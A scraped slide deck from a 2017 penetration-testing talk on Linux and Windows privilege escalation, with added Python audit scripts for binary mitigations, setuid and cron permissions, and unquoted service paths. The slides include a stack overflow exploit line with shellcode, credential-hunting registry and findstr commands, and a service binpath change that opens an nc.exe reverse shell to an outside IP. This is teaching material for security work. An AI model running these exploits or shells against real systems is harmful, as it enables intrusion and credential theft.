How Fun of Privilege Escalation
Ammarit Thongthua, CISSP CISM GXPN
Risk Advisory Manager, Deloitte Thailand
# whoami
<Name>
Ammarit Thongthua
Khay
Shellcodenoobx
</Name>
<Job>
Risk Advisory Manager, Deloitte Thailand
Penetration Tester
Security Consultant
</Job>
<Education>
B.Eng Com, ABAC
M.Sci Cyber Security and Info Assurance, Mahidol Unv.
CISSP, CISM, CSSLP, GXPN, CCNP, CEH, Security+
</Education>
Pre Exploitation
Exploitation
Post Exploitation
# “Privilege Escalation”
Information gathering
Scanning
Enumeration
Remote Exploitation
- Gain system access
- Gain information
- Denial of services
- Privilege Escalation
Local Exploitation
- Bypass Restriction
- Privilege Escalation
Gathering Sensitive Info
Manage System/Service
Pivoting
Windows
# “Privilege Escalation”
Windows: NT AUTHORITY\System, Administrators, Power Users, Users, Service Users
Unix: Root, Sudoer, Users, Service Users
# “Privilege Escalation”
• Vertical privilege escalation -> Gain higher privilege
• Horizontal privilege escalation -> Gain access with other accounts
Diagram labels: Users (john), Service Users (Apache, mysql), Root
# “Privilege Escalation”
Diagram: Windows privilege levels (Users / Service Users, Power Users, Administrators, NT AUTHORITY\System) with entry points Anonymous FTP, Webshell, Local Exploit, Vulnerable Service Exploit
# “Privilege Escalation”
Diagram: Windows privilege levels (Users / Service Users, Power Users, Administrators, NT AUTHORITY\System) with Unauthorized Access and Local Exploit as the steps between levels
# Remote and Local Exploitation
Network (TCP/UDP): TCP 20/21, TCP 22, TCP 23, TCP 25, UDP 53, TCP 80, UDP 161, TCP 443, TCP 445, TCP/UDP 514, TCP 1433, TCP 1521, TCP 3306, TCP 3389, TCP XXXX
• Remote Exploitation
# Remote and Local Exploitation
Race Condition
Buffer Overflow
Heap Overflow
Kernel Exploit
Evasion
DLL Injection
DLL Hijacking
Hot Potato
Mis-config Service, file permission
# Remote and Local Exploitation
Root
# “Privilege Escalation”
• Access to restricted resources/file
• System Credential
• /etc/shadow
• SAM file
• Registry
• Configuration files
• Encryption Key
• System memory
• Run privileged commands, set system configuration and installations
• Pivoting
• Maintain access , Backdoor
• Key logger, Rootkit, Dump traffic
• Many more..
# “Privilege Escalation” Ways for Linux
• Remote Exploit to vulnerable service running by high privilege users
• Weak password of high privilege users
• Credential store in file with weak permission
• Configurations, Logs files
• History
• Env, $PATH
• Shell Escape (restricted shell, chroot)
• Vulnerable Applications / Programs / Services use high privilege users
• Weak permission file of Jobs/Task run by high privilege users
• Sudoer
• System Misconfiguration
• Kernel Exploitation
• Remote Exploitation by local host
# “Privilege Escalation” Ways for Linux
• Remote Exploit to vulnerable service running by high privilege users
FILE_SERVER
# ps -ef | grep root
root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D
# “Privilege Escalation” Ways for Linux
• Weak password of high privilege users
Maybe a password similar to the username, or a weak password (root, Password, P@ssw0rd, ...)
# “Privilege Escalation” Ways for Linux
• Credential store in file with weak permission
• Configurations, Logs files
• History
• Env, $PATH
# “Privilege Escalation” Ways for Linux
• Restricted Shell Escape
https://netsec.ws/?p=337
https://0feci.wordpress.com/tag/escaping-restricted-shell-bypass/
# “Privilege Escalation” Ways for Linux
• Vulnerable Applications / Programs / Services use high privilege users
• Characteristic of vulnerable program
• Has permission “root” as user or group
• Has set SUID, SGID
• Can perform Overflow
• Use Static Libc. (Nice to have)
# “Privilege Escalation” Ways for Linux
• Vulnerable Applications / Programs / Services use high privilege users
• Characteristic of vulnerable program: has permission “root” as user or group, has set SUID, SGID
list="$(find / -perm -4000 -o -perm -2000)"; for i in $list; do ls -al $i; done
ls -R / | grep "wsr" | grep "root"
# “Privilege Escalation” Ways for Linux
• Vulnerable Applications / Programs / Services use high privilege users
Check buffer overflow position
# objdump -d vul_app | grep "jmp" | grep "esp"
# ROPgadget --binary vul_app --only "jmp" | grep esp
0x08049f0f : jmp %esp
# “Privilege Escalation” Ways for Linux
• Vulnerable Applications / Programs / Services use high privilege users
Shellcode: system(“/bin//sh”)
Shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80"
Diagram labels: jmp %esp, 0x08049f0f, esp
# python -c 'print "A"*612 + "\x0f\x49\x04\x08" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80"' | ./vul_app
# “Privilege Escalation” Ways for Linux
Privilege is dropped: a shell such as bash resets its effective UID to the real UID at startup when the two differ (unless started with -p), so the /bin/sh spawned by the shellcode runs as the low-privileged user
# “Privilege Escalation” Ways for Linux
• Vulnerable Applications / Programs / Services use high privilege users
# nano /tmp/sh.c
# “Privilege Escalation” Ways for Linux
• Vulnerable Applications / Programs / Services use high privilege users
# python -c 'print "A"*612 + "\x0f\x49\x04\x08" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x74\x6d\x70\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80"' | ./vul_app
tmp: the pushed string is now /tmp//sh instead of /bin//sh, so the shellcode runs the program built from /tmp/sh.c
# “Privilege Escalation” Ways for Linux
The real life is not easy !!!!
• Canary (Buffer overflow detection)
• Executable Stack Prevention (NX , DEP)
• Address Space Layout Randomization (ASLR)
# “Privilege Escalation” Ways for Linux
But It’s possible to bypass !!!
• Canary (Buffer overflow detection) -> Canary Repair
• Executable Stack Prevention (NX , DEP) -> Ret-2-Libc , ROP
• Address Space Layout Randomization (ASLR) -> Static Lib, App Warp Up
https://www.slideshare.net/ammarit/unix-executable-buffer-overflow?qid=3ae3efd0-d1b4-4f3c-b85c-82b1d063aa6b&v=&b=&from_search=1
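As an added example (not part of the slides), a small Python checker that reads ELF64 headers to report the three mitigations just listed: NX from the PT_GNU_STACK flags, PIE from the ELF type, and the canary by a heuristic search for the `__stack_chk_fail` symbol name. The ELF images it parses are constructed inline so it runs offline.

```python
import struct

# ELF constants used below (values from the ELF specification)
ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4
EHDR_FMT = "HHIQQQIHHHHHH"   # Elf64_Ehdr fields that follow e_ident
PHDR_FMT = "IIQQQQQQ"        # Elf64_Phdr


def checksec(data: bytes) -> dict:
    """Report NX / PIE / canary status for an ELF64 image held in memory."""
    if data[:4] != b"\x7fELF" or data[4] != 2:
        raise ValueError("not an ELF64 image")
    end = "<" if data[5] == 1 else ">"          # EI_DATA: 1 = little-endian
    hdr = struct.unpack(end + EHDR_FMT, data[16:64])
    e_type, phoff, phentsize, phnum = hdr[0], hdr[4], hdr[8], hdr[9]
    # Without a PT_GNU_STACK entry the kernel historically grants an
    # executable stack, so the report defaults to "no NX".
    nx = False
    for i in range(phnum):
        off = phoff + i * phentsize
        p_type, p_flags = struct.unpack(end + "II", data[off:off + 8])
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
    return {
        "nx": nx,                  # stack not executable: shellcode placed on the stack cannot run
        "pie": e_type == ET_DYN,   # position-independent: ASLR can also randomise the code base
        # heuristic: gcc references this symbol when built with -fstack-protector
        "canary": b"__stack_chk_fail" in data,
    }


def build_elf64(e_type: int, stack_flags: int, extra: bytes = b"") -> bytes:
    """Constructed minimal ELF64 (header + one PT_GNU_STACK entry) for offline testing."""
    ehsize, phentsize, phoff = 64, 56, 64
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\0" * 8   # 64-bit, little-endian, v1
    ehdr = ident + struct.pack("<" + EHDR_FMT,
                               e_type, 0x3E, 1, 0x401000, phoff, 0, 0,
                               ehsize, phentsize, 1, 0, 0, 0)
    phdr = struct.pack("<" + PHDR_FMT, PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    return ehdr + phdr + extra


def checksec_file(path: str) -> dict:
    """Convenience wrapper for a real binary on disk."""
    with open(path, "rb") as f:
        return checksec(f.read())


if __name__ == "__main__":
    legacy = build_elf64(ET_EXEC, PF_R | PF_W | PF_X)
    hardened = build_elf64(ET_DYN, PF_R | PF_W, b"\0__stack_chk_fail\0")
    print("legacy  :", checksec(legacy))
    print("hardened:", checksec(hardened))
```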
# “Privilege Escalation” Ways for Linux
• Weak permission file of Jobs/Task run by high privilege users
/etc/cron.d
/etc/crontab
/etc/cron.hourly
/etc/cron.daily
/etc/cron.weekly
/etc/cron.monthly
# ls -Ral /etc/cron*
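As an added example (not from the slides), a small Python audit over output in the format of `ls -al` on each find result and of `ls -Ral /etc/cron*`, serving both the SUID/SGID check earlier and the cron file permission check here. The listing is constructed; beyond the `grep "wsr"` one-liner it also reports setgid files and the capital-S case where the setuid bit is set without the execute bit, and it flags world-writable files that run with root rights.

```python
# Constructed sample in the format of `ls -al <file>` and `ls -Ral /etc/cron*`
SAMPLE_LISTING = """\
-rwsr-xr-x 1 root root    54256 Jan  1 12:00 /usr/bin/passwd
-rwSr--r-- 1 root root     1234 Jan  1 12:00 /usr/local/bin/legacy_tool
-rwsrwxrwx 1 root root    12345 Jan  1 12:00 /opt/vendor/bin/helper
-rwxr-sr-x 1 root shadow   9876 Jan  1 12:00 /usr/bin/chage
-rwxr-xr-x 1 root root     4096 Jan  1 12:00 /usr/bin/ls
/etc/cron.daily:
total 8
drwxr-xr-x 2 root root     4096 Jan  1 12:00 .
-rwxrwxrwx 1 root root      210 Jan  1 12:00 backup
-rwxr-xr-x 1 root root      180 Jan  1 12:00 rotate
"""


def parse_mode(mode: str) -> dict:
    """Decode a 10-character ls mode string such as '-rwsr-xr-x'."""
    if len(mode) != 10:
        raise ValueError(f"unexpected mode string: {mode!r}")
    return {
        "is_dir": mode[0] == "d",
        "setuid": mode[3] in "sS",        # 'S' = setuid set but owner-exec clear
        "setgid": mode[6] in "sS",
        "world_writable": mode[8] == "w",
    }


def parse_listing(text: str) -> list:
    """Turn ls -l / ls -R output into entry dicts with absolute paths."""
    entries, cwd = [], ""
    for line in text.splitlines():
        line = line.rstrip()
        if not line or line.startswith("total "):
            continue
        if line.endswith(":"):            # directory header printed by ls -R
            cwd = line[:-1]
            continue
        parts = line.split(None, 8)       # mode links owner group size mon day time name
        if len(parts) < 9 or parts[8] in (".", ".."):
            continue
        name = parts[8]
        path = name if name.startswith("/") or not cwd else f"{cwd}/{name}"
        entry = {"path": path, "mode": parts[0], "owner": parts[2], "group": parts[3]}
        entry.update(parse_mode(parts[0]))
        entries.append(entry)
    return entries


def root_setid_binaries(entries: list) -> list:
    """Files with setuid or setgid owned by root: the `find -perm -4000 -o -perm -2000` set."""
    return [e["path"] for e in entries
            if not e["is_dir"] and e["owner"] == "root" and (e["setuid"] or e["setgid"])]


def missed_by_grep_wsr(entries: list) -> list:
    """Set-id root files that the `grep "wsr"` one-liner would not report."""
    setid = root_setid_binaries(entries)
    return [e["path"] for e in entries if e["path"] in setid and "wsr" not in e["mode"]]


def writable_privileged(entries: list) -> list:
    """World-writable files that run with elevated rights: set-id binaries and cron jobs."""
    return [e["path"] for e in entries
            if e["world_writable"] and not e["is_dir"]
            and (e["setuid"] or e["setgid"] or e["path"].startswith("/etc/cron"))]


if __name__ == "__main__":
    found = parse_listing(SAMPLE_LISTING)
    print("set-id root binaries :", root_setid_binaries(found))
    print("missed by grep wsr   :", missed_by_grep_wsr(found))
    print("world-writable & priv:", writable_privileged(found))
```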
# “Privilege Escalation” Ways for Linux
• Weak permission file of Jobs/Task run by high privilege users
Reverse shell
# “Privilege Escalation” Ways for Linux
• Sudoer (the compromised user may be in the sudoers list)
# “Privilege Escalation” Ways for Linux
• System Misconfiguration
# “Privilege Escalation” Ways for Linux
• Kernel Exploitation
Ex: DirtyCOW
# “Privilege Escalation” Ways for Linux
• Kernel Exploitation (Trick)
Ex: Linux version 2.6.9-89.EL
• Compile the exploit on the target system or in a target-like environment
• Metasploitable is a good environment for compiling exploits
# “Privilege Escalation” Ways for Linux
# ps -ef | grep root
root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D
• Remote Exploitation by local host (127.0.0.1)
# “Privilege Escalation” Ways for Linux
• [Linux Privilege Escalation Scripts and Commands]
Ref : https://netsec.ws/?p=309
LinEnum
http://www.rebootuser.com/?p=1758
LinuxPrivChecker
http://www.securitysift.com/download/linuxprivchecker.py
Basic-linux-privilege-escalation
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation
• LinuxPrivChecker
# “Privilege Escalation” Ways for Linux
# “Privilege Escalation” Ways for Linux
• Case Study :
# “Privilege Escalation” Ways for Linux
• Case Study :
But no exploit detail in exploit-db !!!
# “Privilege Escalation” Ways for Linux
• Case Study :
Diagram labels: Low Priv, Bypass Restrict Shell, Dirty Cow, root, Default password, Crack root pass, Other Unix Servers, CMC
# “Privilege Escalation” Ways for Windows
• Remote Exploit to vulnerable service running by high privilege users
• Weak password of high privilege users
• Credential store in file and Registry
• Vulnerable Applications / Programs / Services use high privilege users
• Weak permission file of Jobs/Task run by high privilege users
• System Misconfiguration
• Kernel Exploitation
• Pass-the-hash
• DLL Injection
• DLL Hijacking
• Remote Exploitation by local host
• Hotpotato
• Many more…
# Remote Exploit to escalate privilege
• Exploit to vulnerable service running with high privilege users
Credit : Worawit Wangwarunyoo (sleepya)
• Exploit a vulnerability in a misconfigured service running with high privilege users
# Remote Exploit to escalate privilege
WebShell
# “Privilege Escalation” Ways for Windows
• Reverse Meterpreter “getsystem” command
“It’s not always easy in the real life”
• PS Migration
# Remote Exploit to escalate privilege
• Credential store in files
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
Search terms: Pass, PASS, PWD
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
# Remote Exploit to escalate privilege
• Credential store in DC Policy Script files (\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies)
https://adsecurity.org/?p=2288
# Remote Exploit to escalate privilege
• Credential store in registry
# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# SNMP Parameters
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
# Remote Exploit to escalate privilege
http://www.labofapenetrationtester.com/2015/05/dumping-passwords-in-plain-on-windows-8-1.html
Windows Server 2012
# Remote Exploit to escalate privilege
• Token Impersonation
https://www.offensive-security.com/metasploit-unleashed/fun-incognito/
• Insecure Services permission
# “Privilege Escalation” Ways for Windows
• Insecure Services permission -> Modify binpath
https://technet.microsoft.com/en-us/sysinternals/accesschk.aspx
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
• Insecure Services permission -> Modify binpath (Example)
sc config upnphost binpath= "C:\Inetpub\nc.exe -nv 10.11.0.110 5555 -e C:\WINDOWS\System32\cmd.exe"
• Insecure Services permission by msf
# “Privilege Escalation” Ways for Windows
Ref: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
• Unquoted Service Paths
When Windows attempts to run this service, it will look at the following paths in order and will run the first EXE that it will find:
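As an added example (not from the slides or the referenced post), a Python helper that lists the executables Windows would try for an unquoted service path, flags such services in a constructed set of ImagePath values, and names the parent directories whose ACLs a defender has to check. Service names and paths are invented.

```python
import re

# Constructed sample of service ImagePath values (names and paths are invented)
SAMPLE_SERVICES = {
    "GoodSvc": r'"C:\Program Files\Good Vendor\good.exe" -run',
    "BadSvc": r'C:\Program Files\Bad Vendor\Svc Dir\bad.exe -k arg',
    "SysSvc": r'C:\Windows\System32\svchost.exe -k netsvcs',
    "Agent": r'C:\tools\agent.exe',
}


def service_binary(image_path: str) -> str:
    """Return the executable part of an ImagePath, dropping trailing arguments."""
    if image_path.startswith('"'):
        return image_path[1:image_path.find('"', 1)]
    m = re.match(r"(.*?\.exe)", image_path, re.IGNORECASE)
    return m.group(1) if m else image_path


def unquoted_path_candidates(image_path: str) -> list:
    """Executables Windows would try, in order, for this ImagePath.

    For an unquoted path containing spaces, the service control manager tries a
    binary at each space boundary before the intended one. A quoted path, or an
    unquoted path without spaces, resolves to the intended binary only.
    """
    binary = service_binary(image_path)
    if image_path.startswith('"') or " " not in binary:
        return [binary]
    words = binary.split(" ")
    return [" ".join(words[:i]) + ".exe" for i in range(1, len(words))] + [binary]


def writable_check_dirs(image_path: str) -> list:
    """Directories whose ACLs decide whether an earlier candidate could be planted."""
    dirs = []
    for cand in unquoted_path_candidates(image_path)[:-1]:
        d = cand.rsplit("\\", 1)[0]
        if d.endswith(":"):            # drive root such as C:
            d += "\\"
        if d not in dirs:
            dirs.append(d)
    return dirs


def find_unquoted_services(services: dict) -> list:
    """Names of services whose ImagePath is unquoted and contains spaces."""
    return [name for name, path in services.items()
            if len(unquoted_path_candidates(path)) > 1]


if __name__ == "__main__":
    for name in find_unquoted_services(SAMPLE_SERVICES):
        path = SAMPLE_SERVICES[name]
        print(name, "->", unquoted_path_candidates(path))
        print("  check write ACLs on:", writable_check_dirs(path))
```

A service flagged here is only exploitable if a low-privileged user can write to one of the listed directories, which is what the accesschk reference earlier on this page is used to determine.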
# “Privilege Escalation” Ways for Windows
Ref:https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
• Unquoted Service Paths
# “Privilege Escalation” Ways for Windows
• Unquoted Service Paths
# “Privilege Escalation” Ways for Windows
• Unquoted Service Paths
# “Privilege Escalation” Ways for Windows
# “Privilege Escalation” Ways for Windows
# “Privilege Escalation” Ways for Windows
• Unquoted path + MS15-067
GGEZ
• DLL Hijacking
# “Privilege Escalation” Ways for Windows
https://msitpros.com/?p=2012
The way that Windows loads DLLs then, is to search the following directories in this order:
– The directory from which the application loaded
– C:\Windows\System32
– C:\Windows\System
– C:\Windows
– The current working directory
– Directories in the system PATH environment variable
– Directories in the user PATH environment variable
https://www.gracefulsecurity.com/privesc-dll-hijacking/
• DLL Hijacking
# “Privilege Escalation” Ways for Windows
https://pentestlab.blog/2017/03/27/dll-hijacking/
# “Privilege Escalation” Ways for Windows
• Driver Exploitation
• Driver Exploitation Example: Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation
https://www.exploit-db.com/exploits/42665/
# “Privilege Escalation” Ways for Windows
• HOT Potato
Manual add user
Use Hot Potato technique
# “Privilege Escalation” Ways for Windows
• Pass-the-Hash
• Remote Exploit on the localhost
# “Privilege Escalation” Ways for Windows
• Local exploit with Metasploit
• Local Exploit to escalate privilege
# “Privilege Escalation” Ways for Windows
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
pip install pyinstaller
# “Privilege Escalation” Ways for Windows
DEMO Noobx_shell
# “Privilege Escalation” Ways for Windows
• Case Study 2 # MS17-010
Diagram labels: DC1, Servers, Client PC (Unpatched)
# “Privilege Escalation” on other devices
• Mobile Phone
• Root or Jailbreak
• DirtyCow
• Network Device
• Remote Exploit
• EXTRABACON exploit
• Backdooring
• ROM0
• Password Crack of high privilege level account
# Prevention
• Secure by design
• System hardening
• Disable unused services
• Disable/remove unused programs, users or backup files
• Install endpoint security
• Strong Access Control and Authentication
• Least Privilege
• Patch Management
• Security Assessment
• Vulnerability Assessment
• Penetration Testing
Q & A
How fun of privilege escalation Red Pill2017
Thank You
Ammarit Thongthua, CISSP CISM GXPN
Risk Advisory Manager, Deloitte Thailand
# References
• http://www.fuzzysecurity.com/tutorials/16.html
• https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
• https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Privilege%20Escalation%20%26%20Post-Exploitation.md
• http://www.hackingarticles.in/7-ways-get-admin-access-remote-windows-pc-bypass-privilege-escalation/
• https://pentestlab.blog/2017/04/04/dll-injection
More Related Content

PDF
Level Up! - Practical Windows Privilege Escalation
PDF
Hunting for Privilege Escalation in Windows Environment
PDF
CNIT 126: 10: Kernel Debugging with WinDbg
PPTX
Malware Static Analysis
PPTX
Practical Malware Analysis: Ch 2 Malware Analysis in Virtual Machines & 3: Ba...
PDF
PHDays 2018 Threat Hunting Hands-On Lab
PPTX
PSConfEU - Offensive Active Directory (With PowerShell!)
PDF
CNIT 152: 1 Real-World Incidents
Level Up! - Practical Windows Privilege Escalation
Hunting for Privilege Escalation in Windows Environment
CNIT 126: 10: Kernel Debugging with WinDbg
Malware Static Analysis
Practical Malware Analysis: Ch 2 Malware Analysis in Virtual Machines & 3: Ba...
PHDays 2018 Threat Hunting Hands-On Lab
PSConfEU - Offensive Active Directory (With PowerShell!)
CNIT 152: 1 Real-World Incidents

What's hot (20)

PDF
CNIT 152: 3 Pre-Incident Preparation
PDF
CNIT 126 11. Malware Behavior
PPTX
Ethical Hacking n VAPT presentation by Suvrat jain
PPTX
Kheirkhabarov24052017_phdays7
PDF
Hunting for Credentials Dumping in Windows Environment
PDF
6 Scope & 7 Live Data Collection
PPT
Secure code practices
PDF
Penetration testing & Ethical Hacking
PPTX
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
PPTX
Introduction to Malware Analysis
PDF
CNIT 126 6: Recognizing C Code Constructs in Assembly
PDF
Bypass_AV-EDR.pdf
PDF
aclpwn - Active Directory ACL exploitation with BloodHound
PPTX
Linux privilege escalation
PPTX
NETWORK PENETRATION TESTING
PDF
Nessus Software
PPTX
PPTX
Catch Me If You Can: PowerShell Red vs Blue
PDF
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
PPTX
mimikatz @ phdays
CNIT 152: 3 Pre-Incident Preparation
CNIT 126 11. Malware Behavior
Ethical Hacking n VAPT presentation by Suvrat jain
Kheirkhabarov24052017_phdays7
Hunting for Credentials Dumping in Windows Environment
6 Scope & 7 Live Data Collection
Secure code practices
Penetration testing & Ethical Hacking
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
Introduction to Malware Analysis
CNIT 126 6: Recognizing C Code Constructs in Assembly
Bypass_AV-EDR.pdf
aclpwn - Active Directory ACL exploitation with BloodHound
Linux privilege escalation
NETWORK PENETRATION TESTING
Nessus Software
Catch Me If You Can: PowerShell Red vs Blue
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
mimikatz @ phdays
Ad

Similar to How fun of privilege escalation Red Pill2017 (20)

PPTX
Privilege Escalation in Ethical Hacking.pptx
PDF
1000 to 0
PPTX
Linux privilege escalation 101
PDF
Privilege escalation from 1 to 0 Workshop
PDF
Check Your Privilege (Escalation)
PDF
Introduction to Linux Privilege Escalation Methods
PPTX
Linx privx privileges-sudo misconfiguration group and docker daemon privileges
PPTX
Fundamentals of Linux Privilege Escalation
PDF
Aide 2014 - Fundamentals of Linux Privilege Escalation
PPTX
Unquoted service path exploitation
PPTX
Linux remote
PPTX
Windows privilege escalation
PPTX
Windows privilege escalation by Dhruv Shah
PDF
Linux Privilege Escalation with Lin Security.
PDF
Methods for Privilege Escalation Part One.pdf
PDF
40 Methods for Privilege Escalation Part 1
PDF
Privilege Escalation Techniques and methodology.pdf
PPTX
Windows Privilege Escalation Techniques.pptx
PPTX
Windows Client Privilege Escalation-Shared.pptx
PPTX
Exploitation techniques and fuzzing
Privilege Escalation in Ethical Hacking.pptx
1000 to 0
Linux privilege escalation 101
Privilege escalation from 1 to 0 Workshop
Check Your Privilege (Escalation)
Introduction to Linux Privilege Escalation Methods
Linx privx privileges-sudo misconfiguration group and docker daemon privileges
Fundamentals of Linux Privilege Escalation
Aide 2014 - Fundamentals of Linux Privilege Escalation
Unquoted service path exploitation
Linux remote
Windows privilege escalation
Windows privilege escalation by Dhruv Shah
Linux Privilege Escalation with Lin Security.
Methods for Privilege Escalation Part One.pdf
40 Methods for Privilege Escalation Part 1
Privilege Escalation Techniques and methodology.pdf
Windows Privilege Escalation Techniques.pptx
Windows Client Privilege Escalation-Shared.pptx
Exploitation techniques and fuzzing
Ad

Recently uploaded (20)

PDF
RMMM.pdf make it easy to upload and study
PDF
BÀI TẬP BỔ TRỢ 4 KỸ NĂNG TIẾNG ANH 9 GLOBAL SUCCESS - CẢ NĂM - BÁM SÁT FORM Đ...
PPTX
BOWEL ELIMINATION FACTORS AFFECTING AND TYPES
PPTX
Week 4 Term 3 Study Techniques revisited.pptx
PDF
Complications of Minimal Access Surgery at WLH
PPTX
Cell Structure & Organelles in detailed.
PPTX
IMMUNITY IMMUNITY refers to protection against infection, and the immune syst...
PPTX
Introduction_to_Human_Anatomy_and_Physiology_for_B.Pharm.pptx
PPTX
Renaissance Architecture: A Journey from Faith to Humanism
PDF
102 student loan defaulters named and shamed – Is someone you know on the list?
PDF
Classroom Observation Tools for Teachers
PPTX
Introduction to Child Health Nursing – Unit I | Child Health Nursing I | B.Sc...
PPTX
Microbial diseases, their pathogenesis and prophylaxis
PDF
Saundersa Comprehensive Review for the NCLEX-RN Examination.pdf
PDF
Module 4: Burden of Disease Tutorial Slides S2 2025
PPTX
The Healthy Child – Unit II | Child Health Nursing I | B.Sc Nursing 5th Semester
PDF
2.FourierTransform-ShortQuestionswithAnswers.pdf
PDF
The Lost Whites of Pakistan by Jahanzaib Mughal.pdf
PDF
Microbial disease of the cardiovascular and lymphatic systems
PDF
01-Introduction-to-Information-Management.pdf
RMMM.pdf make it easy to upload and study
BÀI TẬP BỔ TRỢ 4 KỸ NĂNG TIẾNG ANH 9 GLOBAL SUCCESS - CẢ NĂM - BÁM SÁT FORM Đ...
BOWEL ELIMINATION FACTORS AFFECTING AND TYPES
Week 4 Term 3 Study Techniques revisited.pptx
Complications of Minimal Access Surgery at WLH
Cell Structure & Organelles in detailed.
IMMUNITY IMMUNITY refers to protection against infection, and the immune syst...
Introduction_to_Human_Anatomy_and_Physiology_for_B.Pharm.pptx
Renaissance Architecture: A Journey from Faith to Humanism
102 student loan defaulters named and shamed – Is someone you know on the list?
Classroom Observation Tools for Teachers
Introduction to Child Health Nursing – Unit I | Child Health Nursing I | B.Sc...
Microbial diseases, their pathogenesis and prophylaxis
Saundersa Comprehensive Review for the NCLEX-RN Examination.pdf
Module 4: Burden of Disease Tutorial Slides S2 2025
The Healthy Child – Unit II | Child Health Nursing I | B.Sc Nursing 5th Semester
2.FourierTransform-ShortQuestionswithAnswers.pdf
The Lost Whites of Pakistan by Jahanzaib Mughal.pdf
Microbial disease of the cardiovascular and lymphatic systems
01-Introduction-to-Information-Management.pdf

How fun of privilege escalation Red Pill2017

  • 1. How Fun of Privilege Escalation Ammarit Thongthua, CISSP CISM GXPN Risk Advisory Manager, Deloitte Thailand
  • 2. # whoami <Name> Ammarit Thongthua Khay Shellcodenoobx </Name> <Job> Risk Advisory Manager, Deloitte Thailand Penetration Tester Security Consultant </Job> <Education> B.Eng Com, ABAC M.Sci Cyber Security and Info Assurance, Mahidol Unv. CISSP, CISM, CSSLP, GXPN, CCNP, CEH, Security+ </Education>
  • 3. Pre Exploitation Exploitation Post Exploitation # “Privilege Escalation” Information gathering Scanning Enumeration Remote Exploitation - Gain system access - Gain information - Denial of services - Privilege Escalation Local Exploitation - Bypass Restriction - Privilege Escalation Gathering Sensitive Info Manage System/Service Pivoting Windows
  • 4. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users Users Root Sudoer UsersService Users Service Users Windows Unix
  • 5. # “Privilege Escalation” • Vertical privilege escalation -> Gain higher privilege • Horizontal privilege escalation -> Gain access with other accounts Users Service Users john Apache, mysql Users john Root
  • 6. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users Users UsersService Users Windows Anonymous FTP Webshell LocalExploit Vul. Service Exp
  • 7. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users UsersService Users Windows Unauthorized Access LocalExploit Users
  • 8. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users UsersService Users Windows Unauthorized Access LocalExploit Users
  • 9. # Remote and Local Exploitation Network TCP/UDP TCP: 20/21 TCP: 22 TCP: 23 TCP: 25 UDP: 53 TCP: 80 UDP: 161 TCP: 443 TCP: 445 TCP/UDP : 514 TCP: 1433 TCP: 1521 TCP: 3306 TCP: 3389 TCP: XXXX • Remote Exploitation
  • 10. # Remote and Local Exploitation Race Condition Buffer Overflow Heap Overflow Kernel Exploit Evasion DLL Injection DLL Hijacking Hot Potato Mis-config Service, file permission
  • 11. # Remote and Local Exploitation Root
  • 12. # “Privilege Escalation” • Access to restricted resources/file • System Credential • /etc/shadow • SAM file • Registry • Configuration files • Encryption Key • System memory • Run privilege commands , set system configuration and Installations • Pivoting • Maintain access , Backdoor • Key logger, Rootkit, Dump traffic • Many more..
  • 16. # “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users • Weak password of high privilege users • Credential store in file with weak permission • Configurations, Logs files • History • Env , $PATH • Shell Escape(restrict shell ,chroot) • Vulnerable Applications / Programs / Services use high privilege users • Weak permission file of Jobs/Task run by high privilege users • Sudoer • System Misconfiguration • Kernel Exploitation • Remote Exploitation by local host
  • 17. # “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users
